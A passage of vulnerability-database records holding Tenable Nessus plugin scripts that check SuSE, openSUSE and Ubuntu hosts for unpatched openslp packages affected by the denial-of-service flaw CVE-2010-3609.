5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:07:59", "description": "the openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609).", "edition": 24, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : openslp (openSUSE-SU-2010:0992-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openslp-devel", "p-cpe:/a:novell:opensuse:openslp-32bit", "p-cpe:/a:novell:opensuse:openslp-server", "cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:openslp"], "id": "SUSE_11_3_OPENSLP-101012.NASL", "href": "https://www.tenable.com/plugins/nessus/75689", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openslp-3310.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75689);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3609\");\n\n script_name(english:\"openSUSE Security Update : openslp (openSUSE-SU-2010:0992-1)\");\n script_summary(english:\"Check for the openslp-3310 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"the openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-11/msg00039.html\"\n );\n 
script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openslp packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"openslp-1.2.0-180.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"openslp-devel-1.2.0-180.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"openslp-server-1.2.0-180.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-180.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openslp / openslp-32bit / openslp-devel / openslp-server\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:04:58", "description": "the openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609).", "edition": 24, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : openslp 
(openSUSE-SU-2010:0992-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2011-05-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openslp-devel", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:openslp-32bit", "p-cpe:/a:novell:opensuse:openslp-server", "p-cpe:/a:novell:opensuse:openslp"], "id": "SUSE_11_1_OPENSLP-101012.NASL", "href": "https://www.tenable.com/plugins/nessus/53685", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openslp-3310.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53685);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3609\");\n\n script_name(english:\"openSUSE Security Update : openslp (openSUSE-SU-2010:0992-1)\");\n script_summary(english:\"Check for the openslp-3310 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"the openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-11/msg00039.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openslp packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"openslp-1.2.0-168.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"openslp-devel-1.2.0-168.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"openslp-server-1.2.0-168.12.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-168.12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openslp / openslp-32bit / openslp-devel / openslp-server\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:13:48", "description": "The openslp daemon could run into an endless loop when receiving\nspecially crafted packets. (CVE-2010-3609)\n\nAdditionally the following non-security bugs were fixed :\n\n - 564504: Fix handling of DA answers if both active and\n passive DA detection is off\n\n - 597215: Add configuration options to openSLP:\n net.slp.DASyncReg makes slpd query statically configured\n DAs for registrations, net.slp.isDABackup enables\n periodic writing of remote registrations to a backup\n file which is also read on startup. 
Both options can be\n used to decrease the time between the start of the slpd\n daemon and slpd knowing all registrations.\n\n - 601002: reduce CPU usage spikes on machines with many\n connections by using the kernel netlink interface\n instead of reading the /proc filesystem.\n\n - 626444: Standard compliance was fixed by stripping\n leading and trailing white spaces when doing string\n comparisons of scopes.", "edition": 23, "published": "2010-12-02T00:00:00", "title": "SuSE 11 Security Update : openslp (SAT Patch Number 3317)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2010-12-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:openslp-32bit", "p-cpe:/a:novell:suse_linux:11:openslp", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:openslp-server"], "id": "SUSE_11_OPENSLP-101013.NASL", "href": "https://www.tenable.com/plugins/nessus/50954", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50954);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3609\");\n\n script_name(english:\"SuSE 11 Security Update : openslp (SAT Patch Number 3317)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openslp daemon could run into an endless loop when receiving\nspecially crafted packets. 
(CVE-2010-3609)\n\nAdditionally the following non-security bugs were fixed :\n\n - 564504: Fix handling of DA answers if both active and\n passive DA detection is off\n\n - 597215: Add configuration options to openSLP:\n net.slp.DASyncReg makes slpd query statically configured\n DAs for registrations, net.slp.isDABackup enables\n periodic writing of remote registrations to a backup\n file which is also read on startup. Both options can be\n used to decrease the time between the start of the slpd\n daemon and slpd knowing all registrations.\n\n - 601002: reduce CPU usage spikes on machines with many\n connections by using the kernel netlink interface\n instead of reading the /proc filesystem.\n\n - 626444: Standard compliance was fixed by stripping\n leading and trailing white spaces when doing string\n comparisons of scopes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564504\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=597215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=601002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=626444\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3609.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 3317.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openslp-32bit\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openslp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"openslp-1.2.0-172.10.7.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"openslp-1.2.0-172.10.7.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-172.10.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"openslp-1.2.0-172.10.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"openslp-server-1.2.0-172.10.7.1\")) flag++;\nif 
(rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"openslp-32bit-1.2.0-172.10.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-172.10.7.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:06:24", "description": "the openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609).", "edition": 24, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : openslp (openSUSE-SU-2010:0992-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2011-05-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openslp-devel", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:openslp-32bit", "p-cpe:/a:novell:opensuse:openslp-server", "p-cpe:/a:novell:opensuse:openslp"], "id": "SUSE_11_2_OPENSLP-101012.NASL", "href": "https://www.tenable.com/plugins/nessus/53785", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openslp-3310.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53785);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3609\");\n\n script_name(english:\"openSUSE Security Update : openslp (openSUSE-SU-2010:0992-1)\");\n script_summary(english:\"Check for the openslp-3310 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"the openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=642571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-11/msg00039.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openslp packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openslp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"openslp-1.2.0-174.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"openslp-devel-1.2.0-174.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"openslp-server-1.2.0-174.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-174.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openslp / openslp-32bit / openslp-devel / openslp-server\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T14:46:49", "description": "The openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609). 
This has been fixed.\n\nAdditionally the following non-security bugs were fixed :\n\n - This openSLP update extends the net.slp.isDABackup\n mechanism introduced with the previous update by a new\n configuration option 'DABackupLocalReg'.\n\n - This option tells the openslp server to also backup\n local registrations. (bnc#597215)\n\n - In addition, standard compliance was fixed by stripping\n leading and trailing white spaces when doing string\n comparisons of scopes.", "edition": 24, "published": "2010-11-30T00:00:00", "title": "SuSE 10 Security Update : openslp (ZYPP Patch Number 7187)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2010-11-30T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_OPENSLP-7187.NASL", "href": "https://www.tenable.com/plugins/nessus/50842", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50842);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3609\");\n\n script_name(english:\"SuSE 10 Security Update : openslp (ZYPP Patch Number 7187)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openslp daemon could run into an endless loop when receiving\nspecially crafted packets (CVE-2010-3609). 
This has been fixed.\n\nAdditionally the following non-security bugs were fixed :\n\n - This openSLP update extends the net.slp.isDABackup\n mechanism introduced with the previous update by a new\n configuration option 'DABackupLocalReg'.\n\n - This option tells the openslp server to also backup\n local registrations. (bnc#597215)\n\n - In addition, standard compliance was fixed by stripping\n leading and trailing white spaces when doing string\n comparisons of scopes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3609.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7187.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") 
exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"openslp-1.2.0-22.31.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"openslp-devel-1.2.0-22.31.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-22.31.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"openslp-1.2.0-22.31.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"openslp-devel-1.2.0-22.31.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"openslp-server-1.2.0-22.31.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"openslp-32bit-1.2.0-22.31.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-01T07:11:49", "description": "It was discovered that OpenSLP incorrectly handled certain corrupted\nmessages. A remote attacker could send a specially crafted packet to\nthe OpenSLP server and cause it to hang, leading to a denial of\nservice.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2011-06-13T00:00:00", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 9.10 / 10.04 LTS / 10.10 : openslp, openslp-dfsg vulnerability (USN-1118-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libslp1", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/o:canonical:ubuntu_linux:9.10", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-1118-1.NASL", "href": "https://www.tenable.com/plugins/nessus/55076", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1118-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(55076);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2010-3609\");\n script_bugtraq_id(46772);\n script_xref(name:\"USN\", value:\"1118-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 9.10 / 10.04 LTS / 10.10 : openslp, openslp-dfsg vulnerability (USN-1118-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that OpenSLP incorrectly handled certain corrupted\nmessages. 
A remote attacker could send a specially crafted packet to\nthe OpenSLP server and cause it to hang, leading to a denial of\nservice.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1118-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libslp1 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libslp1\");\n 